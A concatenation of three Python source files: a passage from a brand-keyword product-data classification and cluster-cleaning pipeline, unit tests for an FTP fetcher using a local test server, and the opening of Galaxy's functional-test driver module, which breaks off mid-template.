'maybelline', 'la roche-posay', 'odele', 'neutrogena', 'flamingo', 'inm', 'shea moisture',
'sheamoisture', 'olay', 'cerave', 'nyx', "pond’s", "pond's", 'ponds', 'pacifica',
'aquaphor', 'schick', 'differin', 'garnier', 'l’oréal paris', "l'oréal paris", 'revlon',
'cetaphil','roc', "burt's bees", "burt’s bees", 'sonia kashuk', 'pantene', 'aveeno', 'no7',
'rimell', 'wet n wild']
brands_dict['drugstore'] = list(set(brands_dict['drugstore']))
# for tools
tools_list1 = ['makita', 'bosch', 'dewalt', 'craftsman', 'stanley black & decker', 'ridgid tools', 'ridgid',
'kobalt', 'skil', 'husky tools', 'irwin', 'ryobi', 'milwaukee', 'ames', 'arrow', 'bostitch',
'channellock', 'cmt', 'dremel', 'duo-fast', 'estwing', 'freud', 'grip-rite', 'hilti',
'hitachi', 'irwin tools', 'leatherman', 'little giant ladder', 'marshalltown',
'master magnetics', 'paslode', 'porter-cable', 'red devil', 'rockwell automation', 'stabila',
'stanley', 'stiletto', 'vermont american', 'wener ladder', 'metabo hpt', 'festool', 'mafell',
'knipex', 'wiha', 'ingersoll-rand', 'senco', 'greenlee', 'knaack', 'caterpillar']
tools_list2 = []
# only if we want more here
tools_html = urlopen('https://www.toolup.com/shop-by-brand')
tools_bsObj = BeautifulSoup(tools_html.read(), 'lxml')
tools_lines = tools_bsObj.find_all('div', {'class':'brand-group'})
for tools_line in tools_lines:
tools_brand = tools_line.find_all('li')
for element in tools_brand:
tools_br = element.get_text().lower()
tools_list2.append(tools_br)
brands_dict['tools'] = list(set(tools_list1 + tools_list2))
# for cars
cars_list = []
req = Request('https://www.thetrendspotter.net/popular-car-brands/', headers={'User-Agent': 'Mozilla/5.0'})
cars_html = urlopen(req)
cars_bsObj = BeautifulSoup(cars_html.read(), 'lxml')
cars_lines = cars_bsObj.find_all('h2')
for cars_line in cars_lines:
if len(cars_line.get_text().split('. ')) > 1:
cars_brand = cars_line.get_text().split('. ')[1].lower()
cars_list.append(cars_brand)
cars_list += ['mercedes benz', 'vw', 'yamaha', 'ferrari', 'bentley', 'ram trucks', 'pontiac', 'oldsmobile', 'maserati',
'aston martin', 'bugatti', 'fiat', 'saab', 'suzuki', 'renault', 'peugeot', 'daewoo', 'studebaker',
'hudson', 'citroen', 'mg']
brands_dict['cars'] = list(set(cars_list))
# for technology
brands_dict['technology'] = ['samsung', '3m', 'abb', 'philips', 'schneider electric', 'sennheiser', 'siemens']
# modify in general manually
brands_dict['clothes'] += ['billabong', 'breitling', 'fila', 'hilfiger', 'pandora', 'ray-ban', 'rayban',
'timberland', 'new era', 'bosch']
brands_dict['clothes'] = list(set(brands_dict['clothes']))
brands_dict['electronics_total'] += ['huawei', 'logitech']
#brands_dict['electronics_total'].remove('samsung')
brands_dict['electronics_total'] = list(set(brands_dict['electronics_total']))
"""
random_brands = ['2-POWER', '2-Power', 'A&I Parts', 'ANGELIC DIAMONDS', 'Allison Kaufman',
'American Olean', 'Anuradha Art Jewellery', 'Ariat', 'Bijou Brigitte',
'Birkenstock', 'Black Diamond', 'Brilliant Earth', 'Caratlane', 'Carhartt', 'Casio',
'Chekich', 'DWS Jewellery', 'Dakine', 'Eastpak', 'Emporio Armani', 'Epson',
'Garmin', 'Garrett', 'Hamilton', 'Hopscotch', 'JBL', 'Jordan', 'Kawasaki',
'Kingston', 'LEGO', 'MSI', 'Medline', 'Peacocks', 'Pink Boutique',
'Reebok', 'Rembrandt Charms', 'SanDisk', 'SareesBazaar',
'Select Fashion', 'Toshiba', 'Tumi', 'Unionwear', 'United Colors of Benetton',
'VOYLLA', 'Vera Bradley', 'Wilson', 'Xerox', 'baginning', 'dorothyperkins', 'evans',
'nihaojewelry.com', 'topman']
random_brands = list(set(brand.lower() for brand in random_brands))
brands_dict['random'] = random_brands
with open(os.path.join(product_path, 'brands_dict.json'), 'w', encoding='utf-8') as f:
json.dump(brands_dict, f)
def clean_keywords():
print('clean keywords')
with open(os.path.join(product_path, 'brands_dict.json'), 'r', encoding='utf-8') as f:
brands_dict = json.load(f)
brands_dict['clothes_cleaned'] = ['prada', 'calvin klein', 'louis vuitton', 'under armour', 'the north face',
'tommy hilfiger', 'dolce & gabbana', 'adidas', 'puma', 'oakley', 'dior', 'chanel',
'gap',
'gucci', 'michael kors', 'patagonia', 'moncler', 'armani', 'burberry', 'nike']
brands_dict['electronics_cleaned'] = ['lenovo', 'canon', 'hitachi', 'resonant', 'sony', 'nvidia', 'nintendo',
'apple',
'samsung', 'yaskawa', 'asus', 'dell', 'hp', 'amd', 'nikon', 'xiaomi', 'cisco',
'panasonic', 'intel', 'flex']
with open(os.path.join(product_path, 'brands_dict.json'), 'w', encoding='utf-8') as f:
json.dump(brands_dict, f)
def keyword_search(data_path):
"""
product selection for phase 1b;
selects only "electronic products" for structured data and "clothes" for unstructured data
:return: two dictionaries for electronics, clothes each containing table and row ids
"""
print('run keyword search')
with open(os.path.join(product_path, 'brands_dict.json'), 'r', encoding='utf-8') as f:
brands_dict = json.load(f)
data_files = [file for file in os.listdir(data_path) if file.endswith('.json.gz')]
# for testing
# brands_dict['clothes_cleaned'].append('nejron') ##
# brands_dict['electronics_cleaned'].append('arip santoso') ##
entity = data_path.split('product_')[1]
print(entity)
# check whether dictionaries already exist
if os.path.isfile(os.path.join(product_path, 'product_clothes_v3', 'clothes_dict.json')):
with open(os.path.join(product_path, 'product_clothes_v3', 'clothes_dict.json'), 'r', encoding='utf-8') as f:
clothes_dict = json.load(f)
else:
clothes_dict = {'top100/cleaned': {key: [] for key in brands_dict['clothes']},
'minimum3/cleaned': {key: [] for key in brands_dict['clothes']}}
if os.path.isfile(os.path.join(product_path, 'product_electronics_v3', 'electronics_dict.json')):
with open(os.path.join(product_path, 'product_electronics_v3', 'electronics_dict.json'), 'r',
encoding='utf-8') as f:
electronics_dict = json.load(f)
else:
electronics_dict = {'top100/cleaned': {key: [] for key in brands_dict['electronics_total']},
'minimum3/cleaned': {key: [] for key in brands_dict['electronics_total']}}
if os.path.isfile(os.path.join(product_path, 'product_bikes', 'bikes_dict.json')):
with open(os.path.join(product_path, 'product_bikes', 'bikes_dict.json'), 'r', encoding='utf-8') as f:
bikes_dict = json.load(f)
else:
bikes_dict = {'top100/cleaned': {key: [] for key in brands_dict['bikes']},
'minimum3/cleaned': {key: [] for key in brands_dict['bikes']}}
if os.path.isfile(os.path.join(product_path, 'product_drugstore', 'drugstore_dict.json')):
with open(os.path.join(product_path, 'product_drugstore', 'drugstore_dict.json'), 'r', encoding='utf-8') as f:
drugstore_dict = json.load(f)
else:
drugstore_dict = {'top100/cleaned': {key: [] for key in brands_dict['drugstore']},
'minimum3/cleaned': {key: [] for key in brands_dict['drugstore']}}
if os.path.isfile(os.path.join(product_path, 'product_tools', 'tools_dict.json')):
with open(os.path.join(product_path, 'product_tools', 'tools_dict.json'), 'r', encoding='utf-8') as f:
tools_dict = json.load(f)
else:
tools_dict = {'top100/cleaned': {key: [] for key in brands_dict['tools']},
'minimum3/cleaned': {key: [] for key in brands_dict['tools']}}
if os.path.isfile(os.path.join(product_path, 'product_technology', 'technology_dict.json')):
with open(os.path.join(product_path, 'product_technology', 'technology_dict.json'), 'r', encoding='utf-8') as f:
technology_dict = json.load(f)
else:
technology_dict = {'top100/cleaned': {key: [] for key in brands_dict['technology']},
'minimum3/cleaned': {key: [] for key in brands_dict['technology']}}
if os.path.isfile(os.path.join(product_path, 'product_cars', 'cars_dict.json')):
with open(os.path.join(product_path, 'product_cars', 'cars_dict.json'), 'r', encoding='utf-8') as f:
cars_dict = json.load(f)
else:
cars_dict = {'top100/cleaned': {key: [] for key in brands_dict['cars']},
'minimum3/cleaned': {key: [] for key in brands_dict['cars']}}
if os.path.isfile(os.path.join(product_path, 'product_random', 'random_dict.json')):
with open(os.path.join(product_path, 'product_random', 'random_dict.json'), 'r', encoding='utf-8') as f:
random_dict = json.load(f)
else:
random_dict = {'top100/cleaned': {key: [] for key in brands_dict['random']},
'minimum3/cleaned': {key: [] for key in brands_dict['random']}}
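    # The eight load-or-initialise blocks above could equivalently be driven by one
    # loop (sketch only, behaviour unchanged); note that 'electronics' uses the
    # 'electronics_total' brand list and that clothes/electronics live in *_v3 folders:
    #   entity_dicts = {}
    #   for name, folder, brand_key in [('clothes', 'product_clothes_v3', 'clothes'),
    #                                   ('electronics', 'product_electronics_v3', 'electronics_total'),
    #                                   ('bikes', 'product_bikes', 'bikes'), ...]:
    #       dict_file = os.path.join(product_path, folder, f'{name}_dict.json')
    #       if os.path.isfile(dict_file):
    #           with open(dict_file, 'r', encoding='utf-8') as f:
    #               entity_dicts[name] = json.load(f)
    #       else:
    #           entity_dicts[name] = {'top100/cleaned': {k: [] for k in brands_dict[brand_key]},
    #                                 'minimum3/cleaned': {k: [] for k in brands_dict[brand_key]}}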
count = 0
with progressbar.ProgressBar(max_value=len(data_files)) as bar:
for data_file in data_files:
# if data_file == 'Product_3dcartstores.com_September2020.json.gz': ## for testing
df = pd.read_json(os.path.join(data_path, '{}'.format(data_file)), compression='gzip', lines=True)
clothes_row_ids = []
electronics_row_ids = []
bikes_row_ids = []
drugstore_row_ids = []
tools_row_ids = []
technology_row_ids = []
cars_row_ids = []
random_row_ids = []
            # iterate over rows and look for keywords
if 'brand' in df.columns: # check whether column 'brand' exists
for i in range(df.shape[0]): # iterate over rows
# if i < 1000: # only for testing
row_id = int(df['row_id'][i])
cell = df['brand'][i]
if cell != None:
cell = str(cell).lower()
if cell in brands_dict['clothes']:
clothes_dict[entity][cell].append((data_file, row_id))
clothes_row_ids.append(row_id)
elif cell in brands_dict['electronics_total']:
electronics_dict[entity][cell].append((data_file, row_id))
electronics_row_ids.append(row_id)
elif cell in brands_dict['bikes']:
bikes_dict[entity][cell].append((data_file, row_id))
bikes_row_ids.append(row_id)
elif cell in brands_dict['cars']:
cars_dict[entity][cell].append((data_file, row_id))
cars_row_ids.append(row_id)
elif cell in brands_dict['technology']:
technology_dict[entity][cell].append((data_file, row_id))
technology_row_ids.append(row_id)
elif cell in brands_dict['tools']:
tools_dict[entity][cell].append((data_file, row_id))
tools_row_ids.append(row_id)
elif cell in brands_dict['drugstore']:
drugstore_dict[entity][cell].append((data_file, row_id))
drugstore_row_ids.append(row_id)
elif cell in brands_dict['random']:
random_dict[entity][cell].append((data_file, row_id))
random_row_ids.append(row_id)
elif 'name' in df.columns: # if column 'brand' does not exist check for first word in name column
df['brand'] = ''
                # iterate over rows
for i in range(df.shape[0]):
row_id = int(df['row_id'][i])
if df['name'][i] != None:
name_split_list = str(df['name'][i]).split(' ')
# check for first word in name column
cell = str(name_split_list[0]).lower()
if cell in brands_dict['electronics_total']:
electronics_dict[entity][cell].append((data_file, row_id))
electronics_row_ids.append(row_id)
df.at[i, 'brand'] = cell
elif cell in brands_dict['clothes']:
clothes_dict[entity][cell].append((data_file, row_id))
clothes_row_ids.append(row_id)
df.at[i, 'brand'] = cell
elif cell in brands_dict['bikes']:
bikes_dict[entity][cell].append((data_file, row_id))
bikes_row_ids.append(row_id)
df.at[i, 'brand'] = cell
elif cell in brands_dict['cars']:
cars_dict[entity][cell].append((data_file, row_id))
cars_row_ids.append(row_id)
df.at[i, 'brand'] = cell
elif cell in brands_dict['technology']:
technology_dict[entity][cell].append((data_file, row_id))
technology_row_ids.append(row_id)
df.at[i, 'brand'] = cell
elif cell in brands_dict['tools']:
tools_dict[entity][cell].append((data_file, row_id))
tools_row_ids.append(row_id)
df.at[i, 'brand'] = cell
elif cell in brands_dict['drugstore']:
drugstore_dict[entity][cell].append((data_file, row_id))
drugstore_row_ids.append(row_id)
df.at[i, 'brand'] = cell
elif cell in brands_dict['random']:
random_dict[entity][cell].append((data_file, row_id))
random_row_ids.append(row_id)
df.at[i, 'brand'] = cell
elif len(name_split_list) > 1:
# check for two words (since ngrams brands)
cell = cell + ' ' + str(name_split_list[1]).lower()
if cell in brands_dict['electronics_total']:
electronics_dict[entity][cell].append((data_file, row_id))
electronics_row_ids.append(row_id)
df.at[i, 'brand'] = cell
elif cell in brands_dict['clothes']:
clothes_dict[entity][cell].append((data_file, row_id))
clothes_row_ids.append(row_id)
df.at[i, 'brand'] = cell
elif cell in brands_dict['bikes']:
bikes_dict[entity][cell].append((data_file, row_id))
bikes_row_ids.append(row_id)
df.at[i, 'brand'] = cell
elif cell in brands_dict['cars']:
cars_dict[entity][cell].append((data_file, row_id))
cars_row_ids.append(row_id)
df.at[i, 'brand'] = cell
elif cell in brands_dict['technology']:
technology_dict[entity][cell].append((data_file, row_id))
technology_row_ids.append(row_id)
df.at[i, 'brand'] = cell
elif cell in brands_dict['tools']:
tools_dict[entity][cell].append((data_file, row_id))
tools_row_ids.append(row_id)
df.at[i, 'brand'] = cell
elif cell in brands_dict['drugstore']:
drugstore_dict[entity][cell].append((data_file, row_id))
drugstore_row_ids.append(row_id)
df.at[i, 'brand'] = cell
elif cell in brands_dict['random']:
random_dict[entity][cell].append((data_file, row_id))
random_row_ids.append(row_id)
df.at[i, 'brand'] = cell
elif len(name_split_list) > 2:
# check for three words (since ngrams brands)
cell = cell + ' ' + str(name_split_list[2]).lower()
if cell in brands_dict['electronics_total']:
electronics_dict[entity][cell].append((data_file, row_id))
electronics_row_ids.append(row_id)
df.at[i, 'brand'] = cell
elif cell in brands_dict['clothes']:
clothes_dict[entity][cell].append((data_file, row_id))
clothes_row_ids.append(row_id)
df.at[i, 'brand'] = cell
elif cell in brands_dict['bikes']:
bikes_dict[entity][cell].append((data_file, row_id))
bikes_row_ids.append(row_id)
df.at[i, 'brand'] = cell
elif cell in brands_dict['cars']:
cars_dict[entity][cell].append((data_file, row_id))
cars_row_ids.append(row_id)
df.at[i, 'brand'] = cell
elif cell in brands_dict['technology']:
technology_dict[entity][cell].append((data_file, row_id))
technology_row_ids.append(row_id)
df.at[i, 'brand'] = cell
elif cell in brands_dict['tools']:
tools_dict[entity][cell].append((data_file, row_id))
tools_row_ids.append(row_id)
df.at[i, 'brand'] = cell
elif cell in brands_dict['drugstore']:
drugstore_dict[entity][cell].append((data_file, row_id))
drugstore_row_ids.append(row_id)
df.at[i, 'brand'] = cell
elif cell in brands_dict['random']:
random_dict[entity][cell].append((data_file, row_id))
random_row_ids.append(row_id)
df.at[i, 'brand'] = cell
elif len(name_split_list) > 3:
# check for four words (since ngrams brands)
                                    cell = cell + ' ' + str(name_split_list[3]).lower()
if cell in brands_dict['electronics_total']:
electronics_dict[entity][cell].append((data_file, row_id))
electronics_row_ids.append(row_id)
df.at[i, 'brand'] = cell
elif cell in brands_dict['clothes']:
clothes_dict[entity][cell].append((data_file, row_id))
clothes_row_ids.append(row_id)
df.at[i, 'brand'] = cell
elif cell in brands_dict['bikes']:
bikes_dict[entity][cell].append((data_file, row_id))
bikes_row_ids.append(row_id)
df.at[i, 'brand'] = cell
elif cell in brands_dict['cars']:
cars_dict[entity][cell].append((data_file, row_id))
cars_row_ids.append(row_id)
df.at[i, 'brand'] = cell
elif cell in brands_dict['technology']:
technology_dict[entity][cell].append((data_file, row_id))
technology_row_ids.append(row_id)
df.at[i, 'brand'] = cell
elif cell in brands_dict['tools']:
tools_dict[entity][cell].append((data_file, row_id))
tools_row_ids.append(row_id)
df.at[i, 'brand'] = cell
elif cell in brands_dict['drugstore']:
drugstore_dict[entity][cell].append((data_file, row_id))
drugstore_row_ids.append(row_id)
df.at[i, 'brand'] = cell
elif cell in brands_dict['random']:
random_dict[entity][cell].append((data_file, row_id))
random_row_ids.append(row_id)
df.at[i, 'brand'] = cell
count += 1
bar.update(count)
            # write selected data into separate folders
clothes_df = df[df['row_id'].isin(clothes_row_ids)]
electronics_df = df[df['row_id'].isin(electronics_row_ids)]
bikes_df = df[df['row_id'].isin(bikes_row_ids)]
cars_df = df[df['row_id'].isin(cars_row_ids)]
technology_df = df[df['row_id'].isin(technology_row_ids)]
tools_df = df[df['row_id'].isin(tools_row_ids)]
drugstore_df = df[df['row_id'].isin(drugstore_row_ids)]
random_df = df[df['row_id'].isin(random_row_ids)]
if clothes_df.shape[0] > 0:
clothes_df.to_json(os.path.join(product_path, 'product_clothes_v3', data_file), compression='gzip',
orient='records',
lines=True)
if electronics_df.shape[0] > 0:
electronics_df.to_json(os.path.join(product_path, 'product_electronics_v3', data_file),
compression='gzip', orient='records',
lines=True)
if bikes_df.shape[0] > 0:
bikes_df.to_json(os.path.join(product_path, 'product_bikes', data_file),
compression='gzip', orient='records',
lines=True)
if cars_df.shape[0] > 0:
cars_df.to_json(os.path.join(product_path, 'product_cars', data_file),
compression='gzip', orient='records',
lines=True)
if technology_df.shape[0] > 0:
technology_df.to_json(os.path.join(product_path, 'product_technology', data_file),
compression='gzip', orient='records',
lines=True)
if tools_df.shape[0] > 0:
tools_df.to_json(os.path.join(product_path, 'product_tools', data_file),
compression='gzip', orient='records',
lines=True)
if drugstore_df.shape[0] > 0:
drugstore_df.to_json(os.path.join(product_path, 'product_drugstore', data_file),
compression='gzip', orient='records',
lines=True)
if random_df.shape[0] > 0:
random_df.to_json(os.path.join(product_path, 'product_random', data_file),
compression='gzip', orient='records',
lines=True)
            ## only save the dictionaries every few thousand files
# save dictionaries with selected data
if count % 1000 == 0:
                with open(os.path.join(product_path, 'product_clothes_v3', 'clothes_dict.json'), 'w',
encoding='utf-8') as f:
json.dump(clothes_dict, f)
                with open(os.path.join(product_path, 'product_electronics_v3', 'electronics_dict.json'), 'w',
encoding='utf-8') as f:
json.dump(electronics_dict, f)
with open(os.path.join(product_path, 'product_bikes', 'bikes_dict.json'), 'w',
encoding='utf-8') as f:
json.dump(bikes_dict, f)
with open(os.path.join(product_path, 'product_cars', 'cars_dict.json'), 'w', encoding='utf-8') as f:
json.dump(cars_dict, f)
with open(os.path.join(product_path, 'product_technology', 'technology_dict.json'), 'w',
encoding='utf-8') as f:
json.dump(technology_dict, f)
with open(os.path.join(product_path, 'product_tools', 'tools_dict.json'), 'w',
encoding='utf-8') as f:
json.dump(tools_dict, f)
with open(os.path.join(product_path, 'product_drugstore', 'drugstore_dict.json'), 'w',
encoding='utf-8') as f:
json.dump(drugstore_dict, f)
with open(os.path.join(product_path, 'product_random', 'random_dict.json'), 'w',
encoding='utf-8') as f:
json.dump(random_dict, f)
# save at the end of running
with open(os.path.join(product_path, 'product_clothes_v3', 'clothes_dict.json'), 'w', encoding='utf-8') as f:
json.dump(clothes_dict, f)
with open(os.path.join(product_path, 'product_electronics_v3', 'electronics_dict.json'), 'w',
encoding='utf-8') as f:
json.dump(electronics_dict, f)
with open(os.path.join(product_path, 'product_bikes', 'bikes_dict.json'), 'w', encoding='utf-8') as f:
json.dump(bikes_dict, f)
with open(os.path.join(product_path, 'product_cars', 'cars_dict.json'), 'w', encoding='utf-8') as f:
json.dump(cars_dict, f)
with open(os.path.join(product_path, 'product_technology', 'technology_dict.json'), 'w', encoding='utf-8') as f:
json.dump(technology_dict, f)
with open(os.path.join(product_path, 'product_tools', 'tools_dict.json'), 'w', encoding='utf-8') as f:
json.dump(tools_dict, f)
with open(os.path.join(product_path, 'product_drugstore', 'drugstore_dict.json'), 'w', encoding='utf-8') as f:
json.dump(drugstore_dict, f)
with open(os.path.join(product_path, 'product_random', 'random_dict.json'), 'w', encoding='utf-8') as f:
json.dump(random_dict, f)
def remove_stopwords(token_vector, stopwords_list):
return token_vector.apply(lambda token_list: [word for word in token_list if word not in stopwords_list])
def remove_punctuation(token_vector):
return token_vector.apply(lambda token_list: [word for word in token_list if word not in string.punctuation])
def jaccard_similarity_score(original, translation):
intersect = set(original).intersection(set(translation))
union = set(original).union(set(translation))
try:
return len(intersect) / len(union)
except ZeroDivisionError:
return 0
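# Example (illustrative only):
#   jaccard_similarity_score(['nike', 'air', 'max'], ['nike', 'air', 'force'])
#   -> 2 / 4 = 0.5, because the token sets share {'nike', 'air'} out of
#      {'nike', 'air', 'max', 'force'}.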
def post_cleaning():
"""
    Post-processing: measures the similarity within each cluster_id of the final
    entity tables and removes the rows whose similarity scores do not meet the thresholds.
:return:
"""
entities = ['Bikes', 'Cars', 'Clothes', 'Drugstore', 'Electronics', 'Technology', 'Tools', 'Random']
# entities = ['Tools']
# generate lists for valid electronics and clothes brands
with open(os.path.join(product_path, 'brands_dict.json'), 'r', encoding='utf-8') as f:
brands_dict = json.load(f)
# read final dataframes with all cluster_ids left
for entity in entities:
print('Running post-processing for {}'.format(entity))
clusters_all_df = pd.read_csv(
os.path.join(cluster_path, '{}_clusters_all_8_tables.csv'.format(entity)),
index_col=None)
final_entities_list = list(set(clusters_all_df['cluster_id']))
# lowercase name column for similarity measure
clusters_all_df['name'] = clusters_all_df['name'].apply(lambda row: str(row).lower())
# use tokenizer for name column to get tokens for training the model, remove stopwords and punctuation
clusters_all_df['tokens'] = clusters_all_df['name'].apply(lambda row: word_tokenize(row))
clusters_all_df['tokens'] = remove_stopwords(clusters_all_df['tokens'], stopwords.words())
clusters_all_df['tokens'] = remove_punctuation(clusters_all_df['tokens'])
# get tagged words
tagged_data = [TaggedDocument(words=_d, tags=[str(i)]) for i, _d in
enumerate(clusters_all_df['tokens'])]
# build model and vocabulary
model = Doc2Vec(vector_size=50, min_count=5, epochs=25, dm=0)
model.build_vocab(tagged_data)
# Train model
model.train(tagged_data, total_examples=model.corpus_count, epochs=25)
# compare for all cluster_ids the similarity between the entries within a cluster_id
if entity == 'Electronics':
all_valid_brands = brands_dict['electronics_total']
else:
all_valid_brands = brands_dict[entity.lower()]
valid_indices_all = []
print('measure similarity')
count = 0
with progressbar.ProgressBar(max_value=len(final_entities_list)) as bar:
for cluster_id in final_entities_list:
single_cluster_id_df = clusters_all_df[clusters_all_df['cluster_id'] == cluster_id]
# measure similarity with Doc2Vec
valid_brands = list(filter(lambda brand: brand in all_valid_brands,
single_cluster_id_df['brand_y'].apply(lambda element: str(element).lower())))
if len(valid_brands) > 0:
most_common_brand = max(valid_brands, key=valid_brands.count)
index_most_common = single_cluster_id_df[single_cluster_id_df['brand_y'].apply(
lambda element: str(element).lower()) == most_common_brand].index[
0] # use this as baseline for similarity comparisons within a certain cluster
# calculate similarity and filter for the ones which are in the current cluster
similar_doc = model.docvecs.most_similar(f'{index_most_common}', topn=clusters_all_df.shape[0])
similar_doc_cluster = [tup for tup in similar_doc if int(tup[0]) in list(
single_cluster_id_df.index)] # similarities as tuples with index and similarity measure compared to baseline product
similar_doc_cluster_df = pd.DataFrame(list(similar_doc_cluster), columns=['index', 'doc2vec'])
similar_doc_cluster_df['index'] = [int(i) for i in
similar_doc_cluster_df['index']] # change indices to numbers
# measure similarity with Jaccard
jaccard_score = single_cluster_id_df['name'].apply(lambda row: jaccard_similarity_score(
row, single_cluster_id_df['name'].loc[int(index_most_common)]))
jaccard_score = jaccard_score.drop(int(index_most_common)).sort_values(ascending=False)
jaccard_score_df = pd.DataFrame({'index': jaccard_score.index, 'jaccard': jaccard_score.values})
# merge both similarity measures to one dataframe
similarity_df = pd.merge(similar_doc_cluster_df, jaccard_score_df, left_on='index',
right_on='index', how='left')
                    # select valid cluster_ids by setting thresholds for doc2vec and jaccard similarities
                    # (per-entity thresholds chosen manually; entities without an explicit entry, e.g.
                    # 'Random', fall back to 0.97 / 0.6, the values the previous elif chain left in place)
                    thresholds = {
                        'Bikes': (0.97, 0.6),
                        'Cars': (0.97, 0.6),
                        'Clothes': (0.97, 0.6),
                        'Drugstore': (0.98, 0.6),
                        'Electronics': (0.97, 0.5),
                        'Technology': (0.98, 0.6),
                        'Tools': (0.97, 0.6),
                    }
                    doc2vec_threshold, jaccard_threshold = thresholds.get(entity, (0.97, 0.6))
                    valid_cluster_id_df = similarity_df[(similarity_df['doc2vec'] > doc2vec_threshold) |
                                                        (similarity_df['jaccard'] >= jaccard_threshold)]
valid_cluster_id_indices = valid_cluster_id_df[
'index'].to_list() # list of valid indices within a cluster_id
valid_indices_all += valid_cluster_id_indices
count += 1
bar.update(count)
clusters_all_df_new = clusters_all_df[clusters_all_df.index.isin(valid_indices_all)]
clusters_all_df_new.to_csv(
os.path.join(cluster_path, '{}_clusters_all_8_tables_post_processed.csv'.format(entity)),
columns=None)
### Also exclude same table_ids
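# One possible follow-up for the note above (a sketch, not part of the original
# pipeline; it assumes the post-processed CSVs keep the 'table_id' column from
# the cluster files): keep at most one row per (cluster_id, table_id) pair so a
# single table cannot contribute several offers to the same cluster.
def drop_duplicate_table_ids(clusters_df):
    """Return the dataframe with only the first row per cluster_id/table_id pair."""
    return clusters_df.drop_duplicates(subset=['cluster_id', 'table_id'], keep='first')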
if __name__ == "__main__":
# for multithreading
os.environ['NUMEXPR_MAX_THREADS'] = '24'
format = "%(asctime)s: %(message)s"
logging.basicConfig(format=format, level=logging.INFO,
datefmt="%H:%M:%S")
logging.info("Main : before creating thread")
x = threading.Thread(target=thread_function, args=(1,))
logging.info("Main : before running thread")
x.start()
logging.info("Main : wait for the thread to finish")
# x.join()
logging.info("Main : all done")
"""
# for multiprocessing
sites = [
"https://www.jython.org",
"http://olympus.realpython.org/dice",
] * 80
start_time = time.time()
download_all_sites(sites)
duration = time.time() - start_time
print(f"Downloaded {len(sites)} in {duration} seconds")
"""
# run functions
# clean_clusters()
# get_keywords() ##
# clean_keywords()
keyword_search(cleaned_top100_path)
keyword_search(cleaned_min3_path)
# post_cleaning()
# get_new_keywords()
test = 2
|
test_ftp.py
|
"""Unit tests for cutty.repositories.adapters.fetchers.ftp."""
import os
from collections.abc import Iterator
from pathlib import Path
from threading import Event
from threading import Thread
import pytest
from pyftpdlib.authorizers import DummyAuthorizer
from pyftpdlib.handlers import FTPHandler
from pyftpdlib.servers import FTPServer
from yarl import URL
from cutty.repositories.adapters.fetchers.ftp import ftpfetcher
from cutty.repositories.domain.stores import Store
@pytest.fixture
def repository(tmp_path: Path) -> Path:
"""Fixture for a repository."""
path = tmp_path / "repository.txt"
path.write_text("Lorem")
return path
@pytest.fixture
def server(repository: Path) -> Iterator[URL]:
"""Fixture for an FTP server exposing the repository."""
# Bind to 127.0.0.1 not localhost, because IPv6 is not supported.
# (urllib.request.FTPHandler uses socket.gethostbyname.)
address = ("127.0.0.1", 0)
timeout = 0.001 if os.environ.get("CI") else 0.000001
handler = FTPHandler
handler.authorizer = DummyAuthorizer()
handler.authorizer.add_anonymous(str(repository.parent))
with FTPServer(address, handler) as server:
done = Event()
shutdown = False
def run() -> None:
try:
while not shutdown:
server.serve_forever(timeout=timeout, blocking=False)
finally:
done.set()
thread = Thread(target=run, daemon=True)
thread.start()
host, port = server.address
path = f"/{repository.name}"
yield URL.build(scheme="ftp", host=host, port=port, path=path)
shutdown = True
done.wait()
thread.join()
def test_happy(server: URL, store: Store, repository: Path) -> None:
"""It downloads the file."""
path = ftpfetcher(server, store)
assert path is not None
assert path.read_text() == repository.read_text()
def test_not_matched(store: Store) -> None:
"""It returns None if the URL does not use the ftp scheme."""
url = URL("file:///")
path = ftpfetcher(url, store)
assert path is None
def test_not_found(server: URL, store: Store) -> None:
"""It raises an exception if the server responds with an error."""
with pytest.raises(Exception):
ftpfetcher(server.with_name("bogus"), store)
def test_update(server: URL, store: Store, repository: Path) -> None:
"""It updates a file from a previous fetch."""
ftpfetcher(server, store)
repository.write_text("ipsum")
path = ftpfetcher(server, store)
assert path is not None
assert path.read_text() == repository.read_text()
|
driver_util.py
|
"""Scripts for drivers of Galaxy functional tests."""
import http.client
import logging
import os
import random
import re
import shlex
import shutil
import signal
import string
import subprocess
import sys
import tempfile
import threading
import time
from urllib.parse import urlparse
import nose.config
import nose.core
import nose.loader
import nose.plugins.manager
import yaml
from paste import httpserver
from sqlalchemy_utils import (
create_database,
database_exists,
)
from galaxy.app import UniverseApplication as GalaxyUniverseApplication
from galaxy.config import LOGGING_CONFIG_DEFAULT
from galaxy.model import mapping
from galaxy.model.tool_shed_install import mapping as toolshed_mapping
from galaxy.tool_util.verify.interactor import GalaxyInteractorApi, verify_tool
from galaxy.util import asbool, download_to_file, galaxy_directory
from galaxy.util.properties import load_app_properties
from galaxy.web import buildapp
from galaxy_test.base.api_util import get_master_api_key, get_user_api_key
from galaxy_test.base.env import (
DEFAULT_WEB_HOST,
target_url_parts,
)
from galaxy_test.base.instrument import StructuredTestDataPlugin
from galaxy_test.base.nose_util import run
from tool_shed.webapp.app import UniverseApplication as ToolshedUniverseApplication
from .test_logging import logging_config_file
galaxy_root = galaxy_directory()
DEFAULT_CONFIG_PREFIX = "GALAXY"
GALAXY_TEST_DIRECTORY = os.path.join(galaxy_root, "test")
GALAXY_TEST_FILE_DIR = "test-data,https://github.com/galaxyproject/galaxy-test-data.git"
TOOL_SHED_TEST_DATA = os.path.join(galaxy_root, "lib", "tool_shed", "test", "test_data")
TEST_WEBHOOKS_DIR = os.path.join(galaxy_root, "test", "functional", "webhooks")
FRAMEWORK_TOOLS_DIR = os.path.join(GALAXY_TEST_DIRECTORY, "functional", "tools")
FRAMEWORK_UPLOAD_TOOL_CONF = os.path.join(FRAMEWORK_TOOLS_DIR, "upload_tool_conf.xml")
FRAMEWORK_SAMPLE_TOOLS_CONF = os.path.join(FRAMEWORK_TOOLS_DIR, "samples_tool_conf.xml")
FRAMEWORK_DATATYPES_CONF = os.path.join(FRAMEWORK_TOOLS_DIR, "sample_datatypes_conf.xml")
MIGRATED_TOOL_PANEL_CONFIG = 'config/migrated_tools_conf.xml'
INSTALLED_TOOL_PANEL_CONFIGS = [
os.environ.get('GALAXY_TEST_SHED_TOOL_CONF', 'config/shed_tool_conf.xml')
]
REALTIME_PROXY_TEMPLATE = string.Template(r"""
uwsgi:
http-raw-body: true
interactivetools_map: $tempdir/interactivetools_map.sqlite
python-raw: scripts/interactivetools/key_type_token_mapping.py
# if interactive tool path, jump to interactive tool, else skip to
# endendend (default uwsgi params).
